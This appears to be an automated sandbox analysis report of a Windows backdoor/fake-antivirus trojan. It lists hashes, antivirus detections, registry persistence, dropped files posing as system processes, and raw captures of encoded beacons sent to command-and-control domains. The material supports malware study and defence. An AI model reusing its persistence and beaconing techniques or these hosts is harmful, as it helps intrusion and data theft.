Analysis Date2014-06-15 00:48:24
MD5fa4664b5facd0d5a604f870523b7e9f7
SHA1abdc8e00fb57191caf574dda66c4e1070821f522

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386
Section.text md5: 8f70a2dad80eca1b04c4662752c46594 sha1: 14ffd1d13ee641388b221f9fcc7a67a40b77feab size: 180736
Section.rdata md5: c4e34aa570388c1fcf48840813df2f0d sha1: 0654fdda3751b0947ee04928504fe8402b62eeff size: 3584
Section.data md5: 0faa9795facb98c0a3ea1e86b93e07ee sha1: f247a73316f35007e55ba660fa1b90f74ebd8782 size: 13824
Section.lib md5: 907779c387b6948fe2faf4c296b34b31 sha1: 90ce6516acf2ed456d3333695c4d72c15255d2a6 size: 512
Timestamp2005-10-06 09:56:08
VersionPrivateBuild: 1547
PEhashbabf06a90baa3173423cf77f29105ffd216db2cd
IMPhashbcb9a09e6811b495da9cc21b07729bdc
AV360 SafeGen:Trojan.Heur.KS.1
AV360 SafeGen:Trojan.Heur.KS.1
AVAd-AwareGen:Trojan.Heur.KS.1
AVAd-AwareGen:Trojan.Heur.KS.1
AVAlwil (avast)Cybota [Trj]
AVAlwil (avast)Cybota [Trj]
AVArcabit (arcavir)no_virus
AVArcabit (arcavir)no_virus
AVAuthentiumW32/Goolbot.E.gen!Eldorado
AVAuthentiumW32/Goolbot.E.gen!Eldorado
AVAvira (antivir)TR/Diple.psa
AVAvira (antivir)TR/Diple.psa
AVCA (E-Trust Ino)Win32/Diple.A!generic
AVCA (E-Trust Ino)Win32/Diple.A!generic
AVCAT (quickheal)Backdoor.Cycbot.B
AVCAT (quickheal)Backdoor.Cycbot.B
AVClamAVTrojan.Agent-207401
AVClamAVTrojan.Agent-207401
AVDr. WebTrojan.DownLoader2.5158
AVDr. WebTrojan.DownLoader2.5158
AVEmsisoftGen:Trojan.Heur.KS.1
AVEmsisoftGen:Trojan.Heur.KS.1
AVEset (nod32)Win32/Kryptik.KPB
AVEset (nod32)Win32/Kryptik.KPB
AVFortinetW32/Katusha.O!tr
AVFortinetW32/Katusha.O!tr
AVFrisk (f-prot)W32/Goolbot.E.gen!Eldorado (generic, not disinfectable)
AVFrisk (f-prot)W32/Goolbot.E.gen!Eldorado (generic, not disinfectable)
AVF-SecureGen:Trojan.Heur.KS.1
AVF-SecureGen:Trojan.Heur.KS.1
AVGrisoft (avg)Cryptic.CFW
AVGrisoft (avg)Cryptic.CFW
AVIkarusTrojan-Spy.Win32.Zbot
AVIkarusTrojan-Spy.Win32.Zbot
AVKasperskyTrojan.Win32.Diple.li
AVKasperskyTrojan.Win32.Diple.li
AVMalwareBytesSpyware.Passwords.XGen
AVMalwareBytesSpyware.Passwords.XGen
AVMcafeeBackDoor-EXI.gen.h
AVMcafeeBackDoor-EXI.gen.h
AVMicrosoft Security EssentialsBackdoor:Win32/Cycbot.G
AVMicrosoft Security EssentialsBackdoor:Win32/Cycbot.G
AVMicroWorld (escan)Gen:Trojan.Heur.KS.1
AVMicroWorld (escan)Gen:Trojan.Heur.KS.1
AVNormanwinpe/FakeAV.ACWY
AVNormanwinpe/FakeAV.ACWY
AVRisingno_virus
AVRisingno_virus
AVSophosMal/FakeAV-IS
AVSophosMal/FakeAV-IS
AVSymantecTrojan.Gen
AVSymantecTrojan.Gen
AVTrend MicroBKDR_CYCBOT.SME3
AVTrend MicroBKDR_CYCBOT.SME3
AVVirusBlokAda (vba32)Trojan.FakeAV.0997

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
1
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load ➝
C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates FileC:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data
Creates ProcessC:\Documents and Settings\Administrator\Application Data\dwm.exe
Creates Mutex{4D92BB9F-9A66-458f-ACA4-66172A7016D4}
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutex{61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex{EEEB680D-AE62-4375-B93E-E9AE5FF585C1}
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex{B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNSdifferentdata-one.com
Winsock DNS127.0.0.1
Winsock DNSfreemaildotaccess.com
Winsock DNS4videosoft.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data

Creates ProcessC:\Documents and Settings\Administrator\Application Data\dwm.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft

Creates ProcessC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe

Network Details:

DNS4videosoft.com
Type: A
174.37.30.144
DNSzonetf.com
Type: A
208.73.211.167
DNSzonetf.com
Type: A
208.73.211.161
DNSzonetf.com
Type: A
208.73.211.250
DNSzonetf.com
Type: A
208.73.211.182
DNSzonetf.com
Type: A
208.73.211.176
DNSdifferentdata-one.com
Type: A
DNSfreemaildotaccess.com
Type: A
HTTP GEThttp://4videosoft.com/iphone.gif?tq=gP4aKydkCpd1EC44DwsjoL%2F3GmPrFdTl%2FtjwqJ7r4p7%2B7mzTNEeCvOsMwpFNQiKsmJeV%2FClpIZLzuWIfDRjmkI1NZvwP8HgYdywzmGvG7gU9k7AEuBE5OgjhIhZZP2cQuRh0m9iqZnfCn8iqW6Ii3%2F9vGnHUTUG%2BfO6%2FJOF9qVys9C35Dk3IlNLhcoCmOMmJ5QB7Vhgo1TXhv1Ga8oaVhxWePMT5JDFZEABSTg8REIWLE8XzKu4wzTlOq8B0LkqWIF%2FrLxgidd1QGAyt2dZBjcAZ0gU%2BeVeoNIFuF8UBJ6%2Ba7ogxGdFw50vn0fVBI%2Bo3axaDIqhYQG4QtdomCYFl8C7gziLkSJQr4nHSeiON5qsaiGSz0zgI1vrs5R%2BPEbesvSTDNNjKONhgjMmCiZfBtiIzOT2pmfbiHbG%2BeTp2VYfJ3Xt6VwI4pEYe6Q8c%2F6O1HqosZbn4Xyv%2FoOvCVgmW09lTExXQZXAO5mCzFOl6cEXq8ayEqS%2BBV0372eQr6c3Tj4b8rTsjr1hw
User-Agent: opera/8.11
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJrX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOpPRO%2FUq%2F3vleWbkY%3D
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJrX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88BSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJrX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh8sG%2BcoJtX%2BSNx1Kv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJrX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh%2F82%2BcoJuX%2BSNxL5ygm1C4lKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Flows TCP192.168.1.1:1031 ➝ 174.37.30.144:80
Flows TCP192.168.1.1:1032 ➝ 208.73.211.167:80
Flows TCP192.168.1.1:1033 ➝ 208.73.211.167:80
Flows TCP192.168.1.1:1034 ➝ 208.73.211.167:80
Flows TCP192.168.1.1:1035 ➝ 208.73.211.167:80

Raw Pcap
0x00000000 (00000)   47455420 2f697068 6f6e652e 6769663f   GET /iphone.gif?
0x00000010 (00016)   74713d67 5034614b 79646b43 70643145   tq=gP4aKydkCpd1E
0x00000020 (00032)   43343444 77736a6f 4c253246 33476d50   C44DwsjoL%2F3GmP
0x00000030 (00048)   72466454 6c253246 746a7771 4a377234   rFdTl%2FtjwqJ7r4
0x00000040 (00064)   70372532 42376d7a 544e4565 43764f73   p7%2B7mzTNEeCvOs
0x00000050 (00080)   4d777046 4e51694b 736d4a65 56253246   MwpFNQiKsmJeV%2F
0x00000060 (00096)   436c7049 5a4c7a75 57496644 526a6d6b   ClpIZLzuWIfDRjmk
0x00000070 (00112)   49314e5a 76775038 48675964 79777a6d   I1NZvwP8HgYdywzm
0x00000080 (00128)   47764737 6755396b 37414575 4245354f   GvG7gU9k7AEuBE5O
0x00000090 (00144)   676a6849 685a5a50 32635175 5268306d   gjhIhZZP2cQuRh0m
0x000000a0 (00160)   3969715a 6e66436e 38697157 36496933   9iqZnfCn8iqW6Ii3
0x000000b0 (00176)   25324639 76476e48 55545547 25324266   %2F9vGnHUTUG%2Bf
0x000000c0 (00192)   4f362532 464a4f46 39715679 73394333   O6%2FJOF9qVys9C3
0x000000d0 (00208)   35446b33 496c4e4c 68636f43 6d4f4d6d   5Dk3IlNLhcoCmOMm
0x000000e0 (00224)   4a355142 37566867 6f315458 68763147   J5QB7Vhgo1TXhv1G
0x000000f0 (00240)   61386f61 56687857 65504d54 354a4446   a8oaVhxWePMT5JDF
0x00000100 (00256)   5a454142 53546738 52454957 4c453858   ZEABSTg8REIWLE8X
0x00000110 (00272)   7a4b7534 777a546c 4f713842 304c6b71   zKu4wzTlOq8B0Lkq
0x00000120 (00288)   57494625 3246724c 78676964 64315147   WIF%2FrLxgidd1QG
0x00000130 (00304)   41797432 645a426a 63415a30 67552532   Ayt2dZBjcAZ0gU%2
0x00000140 (00320)   42655665 6f4e4946 75463855 424a3625   BeVeoNIFuF8UBJ6%
0x00000150 (00336)   32426137 6f677847 64467735 30766e30   2Ba7ogxGdFw50vn0
0x00000160 (00352)   66564249 2532426f 33617861 44497168   fVBI%2Bo3axaDIqh
0x00000170 (00368)   59514734 5174646f 6d435946 6c384337   YQG4QtdomCYFl8C7
0x00000180 (00384)   677a694c 6b534a51 72346e48 5365694f   gziLkSJQr4nHSeiO
0x00000190 (00400)   4e357173 61694753 7a307a67 49317672   N5qsaiGSz0zgI1vr
0x000001a0 (00416)   73355225 32425045 62657376 5354444e   s5R%2BPEbesvSTDN
0x000001b0 (00432)   4e6a4b4f 4e68676a 4d6d4369 5a664274   NjKONhgjMmCiZfBt
0x000001c0 (00448)   69497a4f 5432706d 66626948 62472532   iIzOT2pmfbiHbG%2
0x000001d0 (00464)   42655470 32565966 4a335874 36567749   BeTp2VYfJ3Xt6VwI
0x000001e0 (00480)   34704559 65365138 63253246 364f3148   4pEYe6Q8c%2F6O1H
0x000001f0 (00496)   716f735a 626e3458 79762532 466f4f76   qosZbn4Xyv%2FoOv
0x00000200 (00512)   4356676d 5730396c 54457858 515a5841   CVgmW09lTExXQZXA
0x00000210 (00528)   4f356d43 7a464f6c 36634558 71386179   O5mCzFOl6cEXq8ay
0x00000220 (00544)   45715325 32424256 30333732 65517236   EqS%2BBV0372eQr6
0x00000230 (00560)   6333546a 34623872 54736a72 31687720   c3Tj4b8rTsjr1hw 
0x00000240 (00576)   48545450 2f312e30 0d0a436f 6e6e6563   HTTP/1.0..Connec
0x00000250 (00592)   74696f6e 3a20636c 6f73650d 0a486f73   tion: close..Hos
0x00000260 (00608)   743a2034 76696465 6f736f66 742e636f   t: 4videosoft.co
0x00000270 (00624)   6d0d0a41 63636570 743a202a 2f2a0d0a   m..Accept: */*..
0x00000280 (00640)   55736572 2d416765 6e743a20 6f706572   User-Agent: oper
0x00000290 (00656)   612f382e 31310d0a 0d0a                a/8.11....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4a725825 32425039 68253242 49307344   JrX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f705052 4f253246 55712532 4633766c   OpPRO%2FUq%2F3vl
0x000000c0 (00192)   6557626b 59253344 20485454 502f312e   eWbkY%3D HTTP/1.
0x000000d0 (00208)   310d0a48 6f73743a 207a6f6e 6574662e   1..Host: zonetf.
0x000000e0 (00224)   636f6d0d 0a557365 722d4167 656e743a   com..User-Agent:
0x000000f0 (00240)   204d6f7a 696c6c61 2f342e30 2028636f    Mozilla/4.0 (co
0x00000100 (00256)   6d706174 69626c65 3b204d53 49452036   mpatible; MSIE 6
0x00000110 (00272)   2e303b20 57696e64 6f777320 4e542035   .0; Windows NT 5
0x00000120 (00288)   2e31290d 0a436f6e 74656e74 2d4c656e   .1)..Content-Len
0x00000130 (00304)   6774683a 20300d0a 436f6e6e 65637469   gth: 0..Connecti
0x00000140 (00320)   6f6e3a20 636c6f73 650d0a0d 0a4a3625   on: close....J6%
0x00000150 (00336)   32426137 6f677847 64467735 30766e30   2Ba7ogxGdFw50vn0
0x00000160 (00352)   66564249 2532426f 33617861 44497168   fVBI%2Bo3axaDIqh
0x00000170 (00368)   59514734 5174646f 6d435946 6c384337   YQG4QtdomCYFl8C7
0x00000180 (00384)   677a694c 6b534a51 72346e48 5365694f   gziLkSJQr4nHSeiO
0x00000190 (00400)   4e357173 61694753 7a307a67 49317672   N5qsaiGSz0zgI1vr
0x000001a0 (00416)   73355225 32425045 62657376 5354444e   s5R%2BPEbesvSTDN
0x000001b0 (00432)   4e6a4b4f 4e68676a 4d6d4369 5a664274   NjKONhgjMmCiZfBt
0x000001c0 (00448)   69497a4f 5432706d 66626948 62472532   iIzOT2pmfbiHbG%2
0x000001d0 (00464)   42655470 32565966 4a335874 36567749   BeTp2VYfJ3Xt6VwI
0x000001e0 (00480)   34704559 65365138 63253246 364f3148   4pEYe6Q8c%2F6O1H
0x000001f0 (00496)   716f735a 626e3458 79762532 466f4f76   qosZbn4Xyv%2FoOv
0x00000200 (00512)   4356676d 5730396c 54457858 515a5841   CVgmW09lTExXQZXA
0x00000210 (00528)   4f356d43 7a464f6c 36634558 71386179   O5mCzFOl6cEXq8ay
0x00000220 (00544)   45715325 32424256 30333732 65517236   EqS%2BBV0372eQr6
0x00000230 (00560)   6333546a 34623872 54736a72 31687720   c3Tj4b8rTsjr1hw 
0x00000240 (00576)   48545450 2f312e30 0d0a436f 6e6e6563   HTTP/1.0..Connec
0x00000250 (00592)   74696f6e 3a20636c 6f73650d 0a486f73   tion: close..Hos
0x00000260 (00608)   743a2034 76696465 6f736f66 742e636f   t: 4videosoft.co
0x00000270 (00624)   6d0d0a41 63636570 743a202a 2f2a0d0a   m..Accept: */*..
0x00000280 (00640)   55736572 2d416765 6e743a20 6f706572   User-Agent: oper
0x00000290 (00656)   612f382e 31310d0a 0d0a                a/8.11....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4a725825 32425039 68253242 49307344   JrX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683838 42537225 32466525   OhLgjh88BSr%2Fe%
0x000000c0 (00192)   32425635 5a755267 25334425 33442048   2BV5ZuRg%3D%3D H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a207a   TTP/1.1..Host: z
0x000000e0 (00224)   6f6e6574 662e636f 6d0d0a55 7365722d   onetf.com..User-
0x000000f0 (00240)   4167656e 743a204d 6f7a696c 6c612f34   Agent: Mozilla/4
0x00000100 (00256)   2e302028 636f6d70 61746962 6c653b20   .0 (compatible; 
0x00000110 (00272)   4d534945 20362e30 3b205769 6e646f77   MSIE 6.0; Window
0x00000120 (00288)   73204e54 20352e31 290d0a43 6f6e7465   s NT 5.1)..Conte
0x00000130 (00304)   6e742d4c 656e6774 683a2030 0d0a436f   nt-Length: 0..Co
0x00000140 (00320)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000150 (00336)   0a0d0a37 6f677847 64467735 30766e30   ...7ogxGdFw50vn0
0x00000160 (00352)   66564249 2532426f 33617861 44497168   fVBI%2Bo3axaDIqh
0x00000170 (00368)   59514734 5174646f 6d435946 6c384337   YQG4QtdomCYFl8C7
0x00000180 (00384)   677a694c 6b534a51 72346e48 5365694f   gziLkSJQr4nHSeiO
0x00000190 (00400)   4e357173 61694753 7a307a67 49317672   N5qsaiGSz0zgI1vr
0x000001a0 (00416)   73355225 32425045 62657376 5354444e   s5R%2BPEbesvSTDN
0x000001b0 (00432)   4e6a4b4f 4e68676a 4d6d4369 5a664274   NjKONhgjMmCiZfBt
0x000001c0 (00448)   69497a4f 5432706d 66626948 62472532   iIzOT2pmfbiHbG%2
0x000001d0 (00464)   42655470 32565966 4a335874 36567749   BeTp2VYfJ3Xt6VwI
0x000001e0 (00480)   34704559 65365138 63253246 364f3148   4pEYe6Q8c%2F6O1H
0x000001f0 (00496)   716f735a 626e3458 79762532 466f4f76   qosZbn4Xyv%2FoOv
0x00000200 (00512)   4356676d 5730396c 54457858 515a5841   CVgmW09lTExXQZXA
0x00000210 (00528)   4f356d43 7a464f6c 36634558 71386179   O5mCzFOl6cEXq8ay
0x00000220 (00544)   45715325 32424256 30333732 65517236   EqS%2BBV0372eQr6
0x00000230 (00560)   6333546a 34623872 54736a72 31687720   c3Tj4b8rTsjr1hw 
0x00000240 (00576)   48545450 2f312e30 0d0a436f 6e6e6563   HTTP/1.0..Connec
0x00000250 (00592)   74696f6e 3a20636c 6f73650d 0a486f73   tion: close..Hos
0x00000260 (00608)   743a2034 76696465 6f736f66 742e636f   t: 4videosoft.co
0x00000270 (00624)   6d0d0a41 63636570 743a202a 2f2a0d0a   m..Accept: */*..
0x00000280 (00640)   55736572 2d416765 6e743a20 6f706572   User-Agent: oper
0x00000290 (00656)   612f382e 31310d0a 0d0a                a/8.11....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4a725825 32425039 68253242 49307344   JrX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683873 47253242 636f4a74   OhLgjh8sG%2BcoJt
0x000000c0 (00192)   58253242 534e7831 4b763937 35586c6d   X%2BSNx1Kv975Xlm
0x000000d0 (00208)   35472048 5454502f 312e310d 0a486f73   5G HTTP/1.1..Hos
0x000000e0 (00224)   743a207a 6f6e6574 662e636f 6d0d0a55   t: zonetf.com..U
0x000000f0 (00240)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000100 (00256)   6c612f34 2e302028 636f6d70 61746962   la/4.0 (compatib
0x00000110 (00272)   6c653b20 4d534945 20362e30 3b205769   le; MSIE 6.0; Wi
0x00000120 (00288)   6e646f77 73204e54 20352e31 290d0a43   ndows NT 5.1)..C
0x00000130 (00304)   6f6e7465 6e742d4c 656e6774 683a2030   ontent-Length: 0
0x00000140 (00320)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000150 (00336)   6f73650d 0a0d0a3c 6872202f 3e0a2020   ose....<hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4a725825 32425039 68253242 49307344   JrX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a682532 46383225 3242636f   OhLgjh%2F82%2Bco
0x000000c0 (00192)   4a755825 3242534e 784c3579 676d3143   JuX%2BSNxL5ygm1C
0x000000d0 (00208)   346c4b76 39373558 6c6d3547 20485454   4lKv975Xlm5G HTT
0x000000e0 (00224)   502f312e 310d0a48 6f73743a 207a6f6e   P/1.1..Host: zon
0x000000f0 (00240)   6574662e 636f6d0d 0a557365 722d4167   etf.com..User-Ag
0x00000100 (00256)   656e743a 204d6f7a 696c6c61 2f342e30   ent: Mozilla/4.0
0x00000110 (00272)   2028636f 6d706174 69626c65 3b204d53    (compatible; MS
0x00000120 (00288)   49452036 2e303b20 57696e64 6f777320   IE 6.0; Windows 
0x00000130 (00304)   4e542035 2e31290d 0a436f6e 74656e74   NT 5.1)..Content
0x00000140 (00320)   2d4c656e 6774683a 20300d0a 436f6e6e   -Length: 0..Conn
0x00000150 (00336)   65637469 6f6e3a20 636c6f73 650d0a0d   ection: close...
0x00000160 (00352)   0a564249 2532426f 33617861 44497168   .VBI%2Bo3axaDIqh
0x00000170 (00368)   59514734 5174646f 6d435946 6c384337   YQG4QtdomCYFl8C7
0x00000180 (00384)   677a694c 6b534a51 72346e48 5365694f   gziLkSJQr4nHSeiO
0x00000190 (00400)   4e357173 61694753 7a307a67 49317672   N5qsaiGSz0zgI1vr
0x000001a0 (00416)   73355225 32425045 62657376 5354444e   s5R%2BPEbesvSTDN
0x000001b0 (00432)   4e6a4b4f 4e68676a 4d6d4369 5a664274   NjKONhgjMmCiZfBt
0x000001c0 (00448)   69497a4f 5432706d 66626948 62472532   iIzOT2pmfbiHbG%2
0x000001d0 (00464)   42655470 32565966 4a335874 36567749   BeTp2VYfJ3Xt6VwI
0x000001e0 (00480)   34704559 65365138 63253246 364f3148   4pEYe6Q8c%2F6O1H
0x000001f0 (00496)   716f735a 626e3458 79762532 466f4f76   qosZbn4Xyv%2FoOv
0x00000200 (00512)   4356676d 5730396c 54457858 515a5841   CVgmW09lTExXQZXA
0x00000210 (00528)   4f356d43 7a464f6c 36634558 71386179   O5mCzFOl6cEXq8ay
0x00000220 (00544)   45715325 32424256 30333732 65517236   EqS%2BBV0372eQr6
0x00000230 (00560)   6333546a 34623872 54736a72 31687720   c3Tj4b8rTsjr1hw 
0x00000240 (00576)   48545450 2f312e30 0d0a436f 6e6e6563   HTTP/1.0..Connec
0x00000250 (00592)   74696f6e 3a20636c 6f73650d 0a486f73   tion: close..Hos
0x00000260 (00608)   743a2034 76696465 6f736f66 742e636f   t: 4videosoft.co
0x00000270 (00624)   6d0d0a41 63636570 743a202a 2f2a0d0a   m..Accept: */*..
0x00000280 (00640)   55736572 2d416765 6e743a20 6f706572   User-Agent: oper
0x00000290 (00656)   612f382e 31310d0a 0d0a                a/8.11....


Strings
.(.
..
.
040904b0
1547
PrivateBuild
StringFileInfo
TIMES NEW ROMAN
Translation
VarFileInfo
VS_VERSION_INFO
$2(?gFjp
4nTTk9x
4T+D1(
)7Uj[0
8hE%7c
8ZAFk5
ADVAPI32.dll
AMGetErrorTextW
]a*nr81
aYJ2EW
ccACO$
ClearCommError
CloseHandle
CLSIDFromString
CoCreateInstance
CoFreeUnusedLibraries
CoInitialize
CoInitializeEx
CopyRect
CoRegisterClassObject
CoRevokeClassObject
CoTaskMemAlloc
CoTaskMemFree
CoUninitialize
CreateEventA
CreateFiberEx
CreateFileW
CreateItemMoniker
CreateMutexA
CreateSemaphoreA
CreateStreamOnHGlobal
CreateThread
CreateWindowExA
@.data
DeleteCriticalSection
DestroyWindow
dFS>TC
DisableThreadLibraryCalls
DispatchMessageA
#d>mx7
{d;ON	
du^KFI
EnterCriticalSection
EnumResourceNamesA
ePFwh$>
E;\	$@q
ExitProcess
^f8Y!G
FatalExit
fcAm~/
F'Ds)p:J
FindResourceA
FreeLibrary
>g8'W p
GetACP
GetCurrentProcessId
GetCurrentThread
GetCurrentThreadId
GetExitCodeThread
GetLastError
GetMessageA
GetModuleFileNameA
GetModuleFileNameW
GetProcAddress
GetProcessHeap
GetQueueStatus
GetRunningObjectTable
GetSystemInfo
GetSystemTime
GetSystemTimeAsFileTime
GetThreadPriority
GetTickCount
GetVersionExA
g?/hG,
GlobalAlloc
HeapFree
HMOxzD
ho_;vT
H_;<S!IKj
hwwm^2
H<ZY7Y
@,}i=]
InitializeCriticalSection
InterlockedDecrement
InterlockedIncrement
IsBadReadPtr
IsBadWritePtr
.I		U!
>J7+Hp
JpA!e.
J)QhDBB
JRichu
KERNEL32.dll
=Kh5@k
?KL	,A~
~}L#3k
LeaveCriticalSection
Lh%%~nM
LoadLibraryA
LoadLibraryW
LoadResource
LoadStringA
LocalFree
LockResource
{lOU=8
lstrlenA
L]U3=9n
mDyP$?
?MN\~Hd
MonitorFromWindow
MsgWaitForMultipleObjects
MultiByteToWideChar
n>)6n4!
	no6u,
N)xL>%
ole32.dll
ON]88*-z8
\ow-6^
P0NQ69:ge\
PeekMessageA
PostThreadMessageA
pYgiy`
q2^GK"p
q<#T*o
QUARTZ.dll
QueryPerformanceCounter
`.rdata
RegCloseKey
RegCreateKeyA
RegCreateKeyExA
RegDeleteKeyA
RegEnumKeyExA
RegisterClassA
RegisterWindowMessageA
RegOpenKeyExA
RegQueryValueExA
RegSetValueA
RegSetValueExA
ReleaseMutex
ReleaseSemaphore
